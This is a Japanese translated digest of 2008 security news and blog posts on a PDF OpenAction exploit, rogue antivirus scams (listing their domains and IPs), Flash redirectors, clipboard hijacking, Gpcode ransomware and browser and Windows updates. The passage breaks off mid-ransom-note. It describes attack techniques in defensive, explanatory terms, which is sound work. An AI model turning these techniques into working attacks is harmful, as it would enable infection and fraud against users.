 ちなみに、この研究で取り上げられた製品が、現在出回っている最新の脅威をどの様に良く検出するか確認したいのであれば、AV-test.orgに9月にリリースされた統計をチェックしなさい。このグループの一連のテストはまた、このソフトウェアスウィーツがシステムメモリの使用、proactive malware detection、誤検出率、オンデマンドでのスキャナパフォーマンスの観点からの動作パフォーマンスも検証している。

PDF OpenActionによる脆弱性攻撃
WEBSENCE Security Labs : Blog (2008/10/12)

 我々は最新のPDF脆弱性攻撃がホットな話題になっていることに、より多くの人々がそれを話題にしていることに注目した。ユーザが悪意ある細工をされたPDFドキュメントを開いたとき、その悪意の総体は自動的に実行され、別の悪意あるファイルがインターネットからダウンロードされ、次に実行される。実際に、悪意の総体はある脆弱性が直接攻撃中に使用されることを引き金としていないが、ドキュメントが開かれたときに実行されるアクションを指定できるOpenActionと呼ばれるPDF中のタグを引き金とする。

 この場合、javascript関数VMNoZ7dbNsRz9は、PDFドキュメントが開かれたとき、自動的に稼働する。一瞥して、ファイル全体中にVMNoZ7dbNsRz9の関数の本体を発見できなかったが、直ちにその理由はこの関数がzlibで圧縮されていることにあることを発見した。

  我々は以下のパールコードでVMNoZ7dbNsRz9本体を解凍した。

 結果は暗号化されていた。

 数回の復号化の後、我々は悪意の総体が別のPDFや別の変種に依存する実行用バイナリファイルのダウンロートを引き金にしていることを発見した。

 更に深く調査することで、我々はこの脆弱性の攻撃がCollab.collectEmailInfo()中のバッファオーバーフロー(新しい発見ではない)に関連していることを発見した。

 今やこの攻撃を行う幾つかの変種が存在する。そして、集めた全ての証拠は、このサンプルがある種のツールキットによって作成されていることを示しているので、より多くの変種が浮上してくるであろうと我々は信じている。

 今までに我々はフィールド中に悪意の総体を引き金としてOpenActionタグを使用するサンプルを一つだけ確認しているが、PDFの仕様に応じて、同じことを完成させるいくつもの方法がある。例えば、ドキュメントが開かれたり印刷されたりする時、アプリケーションを起動するよう設計するためにLaunchタグを使用できる。また、URIタグ中のmailtoスキームを悪用する方法も存在する。

Opera 9.6でより良いE-Mailと滑らかなWebサーフィンを
heiseSecurity : Security (2008/10/08)

 ベータがリリースされて二週間、ノルウェーのブラウザデベロッパOperaは、彼らの名を冠しているフリーのWebブラウザOperaのバージョン9.6をリリースした。
 最も顕著な改善は、M2 E-Mailクライアント中に存在する。M2は改良されたThreading(スレッドの抽出/無視の機能)と帯域幅の狭い接続でのE-Mailのために、特別な低速回線モードを持っている。IMAPモードでは、M2はE-Mailヘッダを取得するだけであり、ボディーテキストは要求があった時にのみ取得される。POP3アカウントに関しては、自動的にメッセージの最初の100行だけが取得される。
 ブラウザ中にも新しい機能がある。「Operaリンク」機能は、ユーザの検索履歴と入力されたURLに同期する。
 目新しいのは"scroll markers"(スクロールマーカー)である。ページをスクロールした時、この機能は今迄閲覧していたセクションの末尾をマークするので、今迄見ていた場所に容易に戻ることができる。
 サポートされるプラットフォーム用の変更点と新機能の完全なリストはOperaのWebサイトにある。例えば、Windows版Operaの場合はこちら。ここにはベータからの変更点も別にリストされている。
【訳注】概要・新機能紹介の日本語版はこちらから
 幾つかのリモート実行脆弱性を含む多くのバグがあるので、Operaユーザは速やかにアップグレードすべきである。
 Operaは、Windows、Mac OS X、Linux同様に広範なプラットフォームで利用できる。新しいバージョンはまた、SolarisとFreeBSDでも利用できるようになった。SPARC、PowerPCと32-bitと64-bit Intel x86用バイナリがある。以前のバージョンは、QNX、OS/2、古典的MacOS、BeOS用にも提供されている。
 デスクトップバージョンだけがアップデートされた。Opera Mobileはまだバージョン9.5のベータであり、Windows Mobile 5 と 6 smartphoneでのみ利用できる。Symbian S60ユーザへの安定版はまだバージョン8.65のままである。

Web E-Mailパスワード再設定の危険性
The PC Informant : News (2008/09/29)

 アメリカ共和党副大統領候補サラ・ペイリンが所有するYahooメールアカウントがハックされたという最近のニュースは、多くのWebベースサービスにセキュリティの弱点があることを示唆している。多くのサービスは、今までのパスワードを忘れた場合、新しいパスワードを要求することが可能である。通常、新しいパスワードを取得するために必要な唯一の情報はログイン名と、本人確認用に用意されている問題に対する答えである。E-Mailの場合であれば、ログイン名はE-Mailアドレスの一部なので、誰でもがそれを指摘できる。本人確認用に用意されている問題について言えば、要求される答えはしばしば容易に推測される。もしくは、ペイリンの場合であれば、オンライン情報から可能である。例えば、「あなたの母親の旧姓」や「あなたの好きな色」は好ましい選択ではない。最初の場合では、この情報は、あなたが思っているよりずっと簡単に発見できる。二つ目の場合、可能な答えの数はとても少ない。そして、ハッカーは可能と思われる全てを容易に試みることができる。ハッカーが容易に推測することができない答えの質問を選択しなさい。そのようにするか、母親の旧姓にナンセンスな言葉(例えば、“qvthdex”のような。もしもセキュリティ上の問題を考慮するのであれば、もっと長いものにする)を選択するか、どちらかである。ただし、あなたはその言葉を思い出さなければならないが・・・。

パスワードマネージャ中のバグを修正途上のFirefox3.0.3
heiseSecurity : Security (2008/09/26)

 Firefox 3.0.2中のバグは、Mozila CorporationにFirefox 3.0.3を迅速にリリースさせた。パスワードマネージャ中のバグは、IDNドメイン名(様々な言語の文字で表記されるドメイン名のこと)のついたサイト用パスワードがパスワードマネージャによって保存されたなら、次に、このパスワードが取得されないことを意味している。
 mozilla.dev.planningのポストでMike Beltznerによれば、このバグはデータの損失を発生しないが、パスワードマネージャを多くのインターナショナル・ユーザのためには無用な物にした。この問題は、パスワードの記憶よりむしろ不正な解読に関連している。
 QAとテスティング中に迅速にリリースされたFirefox 3.0.3は来週一般にリリースされる。Ubuntuユーザに関しては、Firefoxは既にUbuntuアップデート中に置かれているので、現在ダウンロードできる。

偽のシステム・シャットダウン・メッセージ
Sunbelt : Blog (2008/09/26)

 何処かのソフトウェア・サイトやアップグレード・サイトからインチキのコーデックをインストールすることは、あなたに、上のエラー画面を含むある種の酷い物を取得させることになる。(上の画面は、革新的マーケティングのPersonalAntiSpyインチキ・セキュリティ・製品を押し付けるものである)

インチキ・ソフト、PersonalAntiSpy Free
Sunbelt : Blog (2008/09/25)

 PersonalAntiSpy Freeは、革新的マーケティングであなたに購入を迫る新たなインチキ・セキュリティソフトである。

 PersonalAntiSpyのホームページ
 93.190.139.197 Personalantispy. com

 典型的なインチキ・スキャンページ

 一旦、このインチキソフトがインストールされたなら、一連の偽の警告で悩まされる。

Windows XP Service Pack 3で、あなたのシステムをダメにする
Windows Seacrets : NewsLetter (2008/09/11)

 Microsoftがリリースした瞬間から、Windows XP SP3はバグ、互換不良、一般的頭痛の種を主題とするレポートが殆ど毎日のごとく発生した。

 事前に予防対策をとることで、あなたは自信を持ってSP3をインストールできる。あるいは、よろしければ、サービスパックをシステムから切り離しておくようにWindows自動更新を設定することができる。

複数の問題がSP3適用者を悩ましている

 Windows Seacretsは、このパッチをまとめた物が最初に配布されて以来ずっと、Windows XP SP3の問題を報告しつづけている。事実、大変多くの読者がSP3(Windows XPの最後のメジャーアップデート)に関する疑問や不平と共に我々にコンタクトしてきた。我々は、このアップデートに関し認識しておく必要のある全てのことを一つの記事として統合した。

 ここに、極めて明白なSP3関連の問題をまとめておく。

  • ブラックホール ルータを使用したときインターネット接続に失敗する。これはパッケットを破棄する。
  • ・Nortonインターネットセキュリティや他のセキュリティアプリケーションで誤検出が発生する。(参照(英文)、http://www.windowssecrets.com/2008/05/22/02-XP-SP3-triggers-false-positives-in-security-apps)
  • ・デバイスマネージャ設定が行方不明になる(とりわけ、Nortonアンチウィルスを使用して接続している場合)。
  • ・AMDプロセッサを使用しているマシン上では、再起動を繰り返す無限ループが発生する
  • いかなる新しいアップデートもインストールできなくなる
  • ・サードパーティー製ビジュアルスタイル(訳注、様々にコントロールおよびウィンドウの外観を定義する手法。通常、スキン等と呼ばれます)は問題に遭遇する。(参照(英文)、http://windowssecrets.com/support-alert/2008/06/19/16-A-solution-to-XP-SP3-trashing-your-visual-styles)

動作するようにアップグレードする

 上述と他の問題の視点から、とりわけ、その拡張の多くがネットワークとITレベル管理に集中しているので、SP3をインストールするかどうか疑問に思うかもしれない。SP3の場合。

セキュリティを考える:
     新しい機能を追加することで、SP3は(多くのサービスパックのように)過去、個々に利用可能だった多くのセキュリティアップデートを含んでいる

サポートを考慮する:
     もしもSP3をインストールするためにMicrosoftの支援を要求するかもしれないと考えているのであれば、Microsoftはそのようなサポートを終了するので、2009年4月以前にこのサービスパック(SP3)を追加する必要がある。2010年早期にSP2に関する全面的サポートが期限切れになるため、あなたがXPに関する一般的サポートを望むのであれば、その日までにSP3をインストールする必要がある。

備えておくこと:
     SP3をインストールする前に、幾つかの予防対策をしなさい。真っ先に、システムを完全にバックアップしなさい。Microsoftは、KB 950717で、推奨されるインストール前に実行する手順の全てを要約している。KB 950717は、上手く行かなかった場合のトラブルシューティング情報も含んでいる。

自動更新からSP3を削除する方法

 SP3を導入しないことを決定したのであれば、Microsoftは、このサービスパックの自動インストレーションを食い止めるためのツールを用意している。このサービスパック ブロッカー ツールキットは、MicrosoftのサイトからSP3を手動ダウンロードすることを妨げることはないが、CDやDVDからこのパッチをインストールすることは停止するだろう。Windowsの自動更新経由でこのサービスパックのインストールを停止するには、このツールを実行するだけである。
 追記、サービスパック ブロッカーは、今年4月のSP3がリリースされた日より一年間だけSP3のインストレーションを延期する。

 Microsoftのサービスパック ブロッカー ダウンロードページ上をサーフし、SPBlockerTools.exeのダウンロードボタンをクリックする(訳注、サービスパック ブロッカー ダウンロードページ上のDownloadボタンをクリックし、開いたページ(英文)で、start downloadリンクをクリックする)。使用許諾を受け入れるために”Yes”をクリックし、このファイルを保存するフォルダをパス中に入力する(保存する場所のパスを入力したくないのであれば、ブラウズボタンをクリックし、適切なフォルダを指示することもできます)。

 一時的にファイルを保存しているフォルダが開き、SPBlockingTool.exeをダブルクリックする。一瞬でコマンドプロンプト ウィンドウが現れ、"Action successfully completed.(「アクションは成功裏に完了した」の意味)"と表示されている。残念ながら、ユーザに多くのことを告げていない。このメッセージが完了したとしているアクションは、Windows Updateをあなたに送信しないように指示するレジストリエントリの追加である(Vistaにも同様の設定がありSP1をブロックする)。

 あなたが追加されたコードを参照したいのであれば、以下を実行する。

  • Step 1 : スタート>ファイル名を指定して実行 と進む。regedit と入力しEnterキーを押す。
  • Step 2 : レジストリエディタの左ペインで以下のエントリに進む。
    HKEY_LOCAL_MACHINE \ SOFTWARE \ Policies \ Microsoft \ Windows \ WindowsUpdate
  • Step 3 : 左ペインでWindowsUpdateアイコンを選択し、右ペインでDoNotAllowSPキーを見つける。

 後日、SP3の適用を自動更新で望むのであれば、単純にDoNotAllowSPキーを選択し、削除すれば良い(もしくは、編集をクリックし削除を選択する)。
レジストリの編集に不安があるのであれば(事実、この操作はリスクを伴う)、サービスパック ブロッカーは、このブロックをアンドゥすることもできる。

  • Step 1 : スタート>ファイル名を指定して実行 と進む。cmd と入力しEnterキーを押す。
  • Step 2 : コマンドプロンプトでSPBlockingTool.exeファイルのパスをタイプするか、このファイルをコマンドプロンプトのウィンドウにドラッグすることで、あなたに代わってWindowsにパスをタイプさせる。
  • Step 3 : このコマンドの末尾に、半角スペースと/Uを入力し、Enterキーを押す。

 もう一度、"Action successfully completed"メッセージが表示される。Windows自動更新はもはやあなたのシステムへのSP3のインストールをブロックしない。

 このダウンロードに含まれる他のツール(SPreg.cmd)は、リモートコンピュータ上へのサービスパックのインストールをブロックしたい管理者に有用なバッチファイルである。このユーティリティは、そのマシンの名前がコマンドライン中に指定されることを要求する。

 大多数のSP3の問題は今や過去の問題になっているが、それでもなお、この様な事前準備はサービスパックの生贄の一人にならないことの保証を支援する。

QuickTime 7.5.5とiTunes 8.0にZero-Dayの脆弱性
McAfee Avert Labs : Blog (2008/09/18)

 最新のQuickTime(Version 7.5.5)とitune(8.0)のZero-Dayの脆弱性が昨日公開された。この脆弱性あるソフトウェアの製作者は、これがリモート ヒープ オーバーフローなので、我々はこの脆弱性を調査・解析することにしたとアナウンスしている。
 我々の研究は、この脆弱性が実際にoff-by-one(1バイトだけオーバーフローするプログラムコードを記述したことによって、任意のコードが実行される脆弱性)スタック オーバーフローであることを発見した。幾つかの注目すべき点:

1. QuickTimeは利用可能な/GSスイッチオプションを持っているので、クッキーはスタック中に置かれる。
2. これはoff-by-oneスタックオーバーフローなので、攻撃者はクッキーの1バイトを上書きできる。Check_stack_cookie(スタックされたクッキーをチェックする)関数は、この関数が戻されるとき呼び出される。Check_stack_cookie関数は、このクッキーがマッチしないことを発見したなら、このプログラムを終了する。これはQuickTimeとiTuneをクラッシュさせる結果となる。
 このクラッシュは、コード実行がこの攻撃ベクトルでは起こりそうもないことを意味している。しかしながら、この様なアプリケーションのユーザは、この攻撃を深刻に受け取り、適切な防衛策を講じるべきである。

ドメイン登録としてのインチキソフト、Purveyor Doubles
Washingtonpost : Security Fix (2008/09/11)

 ハイジャックしたサイトや悪意あるWebサイトを通じてインチキなアンチスパイウェアプログラムを積極的に撒き散らしている既知のサイバーギャングは、ドメイン名の認定販売業者になっていた。Security Fixは、このギャングが彼らの侵略的ソフトウェアを押し付けるために使用した新たなWebサイト作成のプロセスを容易にするために登録者として、そのアクセスを使用中であることを学習した。

   Klikdomains.com(Vivids Media GMBHとしても知られている)はトップレベルドメイン.com, .net, .org, .info, .biz, .name, .us, .in でWebサイト名を販売している。KlikdomainsはKlikvip.comの一部である。このサイトは少なくともこの三年間、人々を欺き彼らのインチキのアンチウィルスやアンチスパイウェア製品をインストールするために報酬を支払う加入者を持っていた。

   専門家は、主なインターネットドメイン名登録者がドメイン再販売業者の行動を規制できないので、Klikdomainsは氷山の一角であると発言している。Klikは、登録機関Directi Internet Solutionsを基にインドでサービスの提供を申し出ているドメイン登録の再販売業者である。先週、Security Fixは、EstDomainsと他のDirecti resellerで登録された巨大な数のスカムドメインを検証した。
 Patrick Jordan(このようなグループの活動を長期間追跡しているSubelt Softwareの研究者)は、Klikのインチキなアンチスパイウェアプログラムはビデオ”コーデック”として偽装して出現しており、幾つかのポルノとYouTubeそっくりのサイトで、ビデオコンテンツを閲覧するためにインストールすることが必要であるとユーザに求めていると発言している。実際には、このコーデックは検索エンジンのトラフィックをハイジャックし、役に立たないセキュリティソフトを購入するよう生贄を納得させるために、でっちあげのセキュリティ脅威に関する偽の警告を提供する。
 Klikギャングによって押し出されたとハッキリ認識できるインチキセキュリティソフト製品は、Razespyware, SpySheriff, Spywareno, Spytrooperである。
 Directiの経営責任者Bhavin Turakhiaは、彼の会社がKlikdomains.comを通して登録された全てのWebサイト名に関する登録者を匿名化するprivacyprotect.orgサービスを無効化したと発言している。過去数年間Directiを通して凡そ100,000Webサイト名が販売されたとも発言している。それらの凡そ半分は不正使用の申し立てによって一時停止されていたとも、Turakhiaは発言している。21,000以上のサイトが、この48時間に一時停止させられた。Directiは現在Klikdomains.comを通して登録された残りの大部分の50,000ドメインを調査中であると、Turakhiaは付け加えている。
 McAfee Avert Labsの研究主任Chris Bartonは、この状況はドメイン登録による再販売者のより積極的監視が必要であることを示していると発言している。
 「私は、この状況は今週二つの会社(数日で20,000以上のドメインを選別していることは、幾つかの正反対の主張があるにもかかわらず、そこに実行される何かが存在する)について良く物語っていると思う。しかしながら、多くを語るインチキサイトが蔓延る登録者と再販売者の新規のビジネスは未だ継続中である。私は法律上の問題が存在することを認識しているが、彼らはリスク全般に対して釣り合いを保ち、そしてプロセスの改善を結合する必要がある。」と彼は発言している。
 様々なコンピュータの自助フォーラムでエントリに目を通すことに多くの時間を費やしたなら、あなたは巨大な数の人々がこの様なインチキなセキュリティソフトウェアプログラムを削除するための支援を求めていることに簡単に気がつくだろう。このソフトウェアの提供者は、検索エンジンが検索結果を一覧表示するときに、自分のウェブページが上位に来るようにあらかじめ工夫をしておくことや、ブログスパム経由でこのサイトにリンクを送信することに熱心であるので、このインチキセキュリティサイトへの大多数のトラフィックは生贄のマシンが既に感染させられたときに発生する。

   Quantcastによって毎日集められるWebサイトの統計を考える。これはWebサイトを人気順にランク付けしたものである。Quantcastの統計で、Webの上位1,000,000のリストは、yourfavoritetube.com(前記した不快なコーデックの一つをインストールするKlik登録ドメイン)が8月中旬を最盛期として560,000以上の訪問があり、7,095位にランクされていた。
 antivirus2008scanner.com--6月ではEstdomains.comで登録されていたインチキなセキュリティソフトウェアのサイト。そして唯一今週店仕舞いした--は、Quantcastによれば、eBayオーストラリア、eBayドイツ、torrentportal.com、discover.com、visa.comよりずっと魅力的として、2051位にランクされていた。より精密な解析として、トラフィック比較サイトCompete.comは、8月中旬にこのサイトに対する1,100,000訪問者について追跡していた(上のスクリーンショット参照)。
 Antivirus2009-freeverscan.com物真似した名前で登録された沢山のインチキセキュリティ製品の一つ--もう一つのDirectiドメイン再販売者--は、dhl.com, informationweek.com, fulltiltpoker.comより上位の2317位にランクされていた。EstDomains登録のPower-antivirus-2009.comは、最近停止させられる前のchrysler.com, pontiac.comやsalesforce.comより多くのトラフィックを受け取っていた。

新たなインチキソフト、Smart Antivirus 2009
Sunbelt : Brog (2008/09/04)

 Smart Antivirus 2009は新たなインチキセキュリティソフト製品であり、AntiSpyware 2008の殆どクローンである。

 Smart Antivirus 2009のホームページ

 典型的なインチキ/虚仮脅しのスキャンページ。

 この屑ソフトが使用しているサイトのリスト。

    Smartantivirus2009. com
    Smartantivirus-2009. com
    Smart-antivirus2009. com
    Smart-antivirus-2009. com
    Smartantivirus2009buy. com
    Smart-antivirus2009buy. com
    Smart-antivirus-2009-buy. com
    Smart-antivirus-2009buy. com
    Smart-antivirus2009-buy. com
    Smartantivirus-2009-buy. com
    Smartantivirus-2009buy. com
    Smartantivirus2009-buy. com

Google Chromeとセキュリティ
F-Secure Weblog : News from the Lab (2008/09/03)

 さあ、Google Chrome Webブラウザがリリースされた。
 これに変更し、あなたのメモリーを全く消費しないブラウザを確認することは素晴らしいことである。
 Chromeは人気になりそうである。これはまた、マルウェア著作者の興味あるターゲットになるだろう。
 Googleはこれを知っている。

 Chromeは、各タブにSandboxing機能(評判の高いWebサービス、特別なプライバシーモード、等)を搭載している
 例えば、Chromeで既知の悪意あるサイトにアクセスをしようとした時、この様に表示される。

 しかしながら、一つのセキュリティ上の脆弱性(Chrome内部で使用されているWebKitエンジンを基にする)が既に発見された。
 とりわけプラグインに関連したより多くの問題が疑われる(注、ChromeはFirefoxのプラグインを使用できる)
 我々は、Chromeが多くの既存のFirefoxユーザから、大きなマーケットシェアを素早く獲得するだろうと考えている。

新たなインチキセキュリティソフト、Total Secure 2009
Sunbelt : Blog (2008/08/28)

 Total Secure 2009は、IEDefenderファミリーによる新しいインチキセキュリティ製品である。

 Getneededsoftware. comサイトのトロイは悪意あるBHO(ブラウザ ヘルパー オブジェクト)をインストールする。このBHOは、この新たなインチキ製品を広告する。

    O2 - BHO: RupTool - {F32B24F1-25FA-4A91-9F97-5272B3CE8FCA} - C:\WINDOWS\system32\xdaszt.dll

 Total Secure 2009のホームページ

    IP: 91.203.92.98
    Totalsecure2009. com

 典型的なインチキな/不安に陥れるスキャンページ。

    IP:77.244.220.141
    checksystem-online. com

 この製品上に実在するアンチウィルスエンジンによる検出は大変貧素である。
 この屑ソフトに関連する追加サイト。

    Secure-order-box. com
    Gettotalsec2008. com
    Getdefender2009. com

悪意あるFlashリダイレクタ
WEBSENCE Security Labs : Threat Blog (2008/08/21)

 大多数の我々のブログの読者は、悪意あるグループによるリダイレクタの使用が、あるページを訪問しているユーザを自動的にリダイレクトすることを良く知っているだろう。一般的に、これはユーザが大変良く知っているが、何らかの方法で改竄されていたリンクを表示する時に実行される。例えば、彼らは、多くの悪意あるWebサイト(ユーザは殆ど知らないのだが)にユーザをリダイレクトする僅か数行のコードを加えるかもしれない。そして、コンテンツと場所は共に大変動的である。
大体の場合、二つのリダイレクタが使用された。iframeリダイレクタとオープン・リダイレクタである。

iframeリダイレクタ

 iframeリダイレクタは、過去数年に渡り頻繁に使用されてきた。悪意あるグループは、あるサイトを改竄しそのページ上に悪意あるWebサイトへ送り込む属性の付いたiframe htmlタグを置いた。これは悪意ある攻撃者が選択した場所にユーザを自動的にリダイレクトする。


Figure 1 : iframeリダイレクタの例

オープン・リダイレクタ

 よりポピュラーでさえあるのが、オープン・リダイレクタの使用である。オープン・リダイレクタは、一般的にURLをプロクシするために広告会社や大会社による合法的目的で使用される。そこで、彼らは、彼らのユーザが何処から来て何処に行ったのかを追跡できる。不幸にして、悪意あるグループはオープン・リダイレクタを使用し、彼らが選択した如何なるWebサイトにもリダイレクトさせることが出来る。ユーザの立場から、ユーザはドメイン名に注目しているかもしれない。そして、リダイレクト・スクリプトであるクエリ文字列の変化に気がつかない


Figure 2 : オープン・リダイレクタの例

Flashリダイレクタ

 最近、Flashリダイレクタは人気を伸ばしてきている。悪意ある攻撃者は、Flashアプリケーションを作成し、無料サイトにそれをホストし、そこへのリンクの付いたスパムメッセージをユーザに送信する。このリンクは通常Flashアプリケーション(swfファイル)である。このリンクをクリックすると自動的にユーザはリダイレクトされる。悪意ある視点からの優位性は、このFlashファイル内部のコンテンツはJavaスクリプトのように読むことが困難であり、難読化されているのでリアルタイムでの解析が困難である。


Figure 3 : スパムが悪意あるSWF Flashファイに使用しているリンクの例

 今週、我々は悪意あるViral Facebookスパムに関しブログした。その、同じ悪意あるグループはFacebook wall上にFlashファイルへのリンクをポストし続けていた。


Figure 4 : SWF FlashファイルへのリンクでスパムされたFacebook wall

 SWFDumpでのこのSWFファイルの解析は、幾つかの単純なアクションスクリプトが、個人情報を取得しようとするWebサイトへ、ユーザをリダイレクトするために基本的に使用されていた。


Figure 5 : 実行中のswfdumpツール


Figure 6 : 悪意あるSWF Flashファイルに対して実行されたswfdumpツール

 これを完成させるためのアクションスクリプトを書くことは、いたって簡単である。navigateToURL関数は、如何なる警告もなしに自動的にユーザをリダイレクトするために使用される。


Figure 7 : websense.comドメインにリダイレクトするFlashリダイレクタのアクションスクリプトのコードの例

 この特別なインスタンスにおいて、Flashファイルは一連の302のリダイレクトを導き、最終的に個人情報を収集するインチキの相性診断Webサイトにいたる。


Figure 7 : 悪意あるFlashリダイレクタをクリックすると、ユーザは自動的にリダイレクトされるフィッシングページにいたる。

クリップボードをハイジャックするWeb攻撃
BBC : TECHNOLOGY (2008/08/18)

 コンピュータセキュリティ企業は記憶されたテキストをコピーするクリップボードをハイジャックする攻撃について警告している。この攻撃は削除することが困難なWebリンクをクリップボード中に置く。そのリンクに従ったなら、インチキのセキュリティソフトを売りつけようとするWebサイトに誘導される。このリンクを挿入するコードは、多くの正当なWebサイトで見られるFlashベースの広告中に発見された。クリップボードへのこの攻撃はFirefoxを使用しているWindowsとMacユーザを攻撃している。

 この攻撃は、そこに置いたと思っていたテキストの代わりにクリップボード中に現れたWebリンクが、ディスカッションフォーラム中の犠牲者のログレポート中に存在したことで判明した。これは、他のテキストを果てしなくクリップボードから締め出し、そこに恒常的に悪意あるリンクを再挿入するような方法を用いて、広告を表示するために使用されるAdobe Flashファイルの脆弱性を攻撃することで動作しているようである。このリンクの削除は解決が難しいことが証明された。ある者は、悪意あるリンクから解放されるために、彼らのマシンを再起動すると報告し、他の者はFirefoxのプロセススレッドをKillすることで停止させると報告している。「これは大変興味を引く攻撃であるが、現時点で広範に拡散していない。今までこの様な攻撃を見たことがない」とF-Secureの研究部門役員 Mikko Hypponen は発言している。彼はまた「これは大変狡賢いテクニックである。もっとも、敵が愚かなら、我々の仕事はもっと簡単なのだが」と発言している。
 Facetime Securityのマルウェア研究部長 Chris Boyd は、数日間この攻撃に従ってみた、と発言した。Boydは、bodyに罠の広告をホストしているサイトへのリンクを有する多数のスパムメールが送信されたのを確認したと発言している。「最近偽のCNN/MSNBCスパムに関連した一連のインチキのアンチウィルスハイジャックが存在した」と彼は発言している。このリンクに従うと、彼らのマシンが悪意あるソフトウェアだらけであると、人々に虚偽を告げるインチキのアンチウィルスセキュリティプログラムを広告しているページに連れていかれる。

Googleサイトを除外したGoogle検索サイト
New York Times : Bits (2008/08/18)

 あなたの好みのGoogle検索結果中に大変多くのGoogleサイトの情報が存在するのであれば、常にGoogle Minus Googleを試してみなさい。

 説明しよう。
 先週、私はメディア会社の中に、Googleが彼らの縄張りを踏み荒らしているという新たな懸念があることを記述した。この懸念は以下のKnol(ウィキペディアのようなコンテンツのサイト。そこで専門家たちが様々な話題に関し記事を投稿する)に関するGoogleの発表で新たに表面化した。Knolのページは、Google検索結果中に驚くほど高い位置にランクされている。
 「Googleはメディア会社ですか?」という見出しを超えて、この物語は幾許かのメディアタイプによって提起された他の質問を調査した。殆ど当てつけだが、或るものは、Knol、YouTube、およびBloggerのようなGoogleで所有されているサイトが検索結果のトップを大量に増加させたとき、何が起こるのかと尋ねてきた。 答え: Googleとメディア会社との見せかけのフレンドシップーそして、多分検索結果の客観性ーが疑われることになる。他の者はまた別の疑問を提起した。
 私の物語はフィンランドのブロガーTimo Paloheimoを触発し、素晴らしいアイデア(Google Minus Google)を思いつかせた。このサイトはGoogle検索エンジンを使用する簡単な方法であるが、Knol, YouTube, Blogger, Orkutと他の多くのようなGoogleドメインをフィルターアウトした結果を表示する。
 Paloheimoはこのサイトが初日に3000ビジターの利用を得たと、アルゼンチンのような遥か遠くからのコメントは魅力的であると発言している。あるブログでは、ウィキペディアをフィルターアウトするバージョンを含むGoogle Minusへの路線転換を示唆されていた。GoogleがGoogle Minus Googleへ著作権やトレードマーク問題を提起するか否か、まだ発言はない。我々はGoogleが発言したらアップデートする。

【アップデート】
 宣言でGoogleが言わなければならなかったことがここにある。「長らく、ユーザはWeb検索の範囲の中で高度な検索機能を経由して彼らの経験をカスタマイズすることが可能であった。そして、我々は役に立つ情報を届け、ユーザの選択を拡張することを支援するあらゆる努力を歓迎する」

【使用した感想】
 検索結果がかなり少なくなる分、使いやすい感じがします。ただ、”日本語ページを検索”オプションはありません。

行方不明のWindowsのパッチ
The PC Informant : blog (2008/08/15)

 我々はこの火曜日にMicrosoftの月例パッチを受け取った。そして、ほんの僅かなセキュリティアップデートが行われた。しかしながら、そこには未パッチの幾つかのセキュリティ問題が残っている。Ryan Naraineは、
この様なMicrosoftのパッチは地球上の何処にあるのかと尋ねている。彼は少なくとも20の既知の高リスクのセキュリティ問題が残っていると指摘し、結論づけている。

    Microsoftはその安全保障とハッカー/研究者との関係を改善する大いなる仕事をしたが、タイムリーにパッチをリリースすることが出来ないことは未だ大きな問題である。
     このCore Securityアドバイザリ(ページの底までスクロールダウン)において公表されているタイムラインは、パッチのリリース スケジュールに固執することが如何にMicrosoftにフラストレーションをもたらしているかを示している。両陣営は2008年一月に最初の報告があったIEの脆弱性を議論している真っ最中であるが、あらゆる種類の(時としてコミカルな)一時的な問題のため膨大な時間遅延されている。
     上述のリストは公開されている既知の問題だけに適用される
     あなたはそこの外に未だ公開されていないものを想像出来ますか?

新しいGpcode ー 殆ど出任せ
Kaspersky : Lab Weblog (2008/08/14)

 我々がここに記したGpcodeの変種は、以前のバージョンに比べ殆ど脅威はない。ASE-256の使用と、巨大な数の一意のキーに関する製作者によってなされた主張はブラフであった。製作者でさえ暗号化に公開鍵を使用していない。そこで、ファイルの復号に必要な情報の全ては悪意あるプログラムの中に存在する。
 我々の解析は、製作者は彼自身の暗号化ルーチンを作成しトラブルを発生させるより、むしろ出来合いのDelphiコンポーネントを見つけだし、このトロイの木馬に3DESアルゴリズムを使用していることを示している。このトロイのコードは以前のGpcodeと大きく異なり、いたる所でとてもゴチャゴチャしている。これは製作者が酷いプログラマであることを示唆している。
 我々はこの新しい変種をTrojan-Ransom.Win32.Gpcode.amと呼ぶ。我々のアンチウィルスアップデートは、暗号化されたファイルの修復プロシージャを含んでいる。そこで、Gpcode.amの犠牲者になったなら、アンチウィルスのデータベースをアップデートしなさい。そして、マシンをフルスキャンしなさい。Gpcodeは製作者の悪意あるプログラム(P2P-Worm.Win32.Socks.fe)によって拡散させられるので、アンチウィルスが幾許かの汚らわしい物を検出しても驚くにあたらない。

Vistaセキュリティ問題に関する追加情報
The PC Informant : blog (2008/08/11)

 私が昨日ポストしたVistaセキュリティ問題に関する合理的決定を行うために、今までに十分な情報が利用可能になっている。まとめると: Vistaは未だXPより安全であるが、考えられていた程安全ではない。あるセキュリティ機能は出し抜かれたが、他は未だ効果がある。Ed Bott(【訳注】以前のPC Worldエディタ)はこの問題に関し幾つかポストした。彼の最新のポストで、Alex Sotirov(このセキュリティ研究の開始者の一人)のPCユーザへの意見を引用している。

     彼らが標準的セキュリティ手続き(アンチウィルス製品と、良い標準的ポリシーがある他の典型的な物を使用する)に従っている限り、彼らは何も心配することはない。我々の研究は、ある程度学術的である。「破壊されている」とか「危機に瀕している」とか「脆弱性の修正不可能」としてVistaセキュリティを記述している記事は、全く不確かである。多くの議論中で私が見た示唆の一つは、人々はWindowsXPを使用すべきとするものであった。事実、XPでは、我々がバイパスしている多くのこの様な防御さえ存在していない。XPはこの点においてVistaよりかなり安全ではない。(我々が立証したことは、VistaがXP以上のセキュリティ上安全であると言うことが(今まで)考えられていたほど素晴らしいものではないということである。Vistaは未だに脆弱性の防御を良くしている。)

再び、Gpcode
Kaspersky : Lab Weblog (2008/08/11)

 今日、我々はGpcodeの新しいバージョンについての不穏な噂を聞いた。我々は、直ちに犠牲者と話をし、インターネットでサンプルを徹底的に探した。
 若干の捜索後、我々は犠牲者が我々に与えた説明に相当するサンプルを発見した。このプログラムは現在ボットNet(セキュリティ目的から名前は公開しない)経由で拡散している真っ最中である。
 Gpcodeはcryoted.txtと名付けた10$の身代金の要求を含むテキストファイルを残す。このファイルはまた、著作者へのコンタクトの詳細(E-Mailアドレス、ICQ番号、URL)を含んでいる。このWebページはロシア語の以下のテキストを含んでいる。

【訳注】ロシア語の表示は省略します

翻訳:(翻訳に関してエラーを含んでいるかもしれません)

     ご機嫌よう
     あなたへの3つのお知らせです。一つはあまり良くない。他の二つは非常に良い。あまり良くないことから始める。
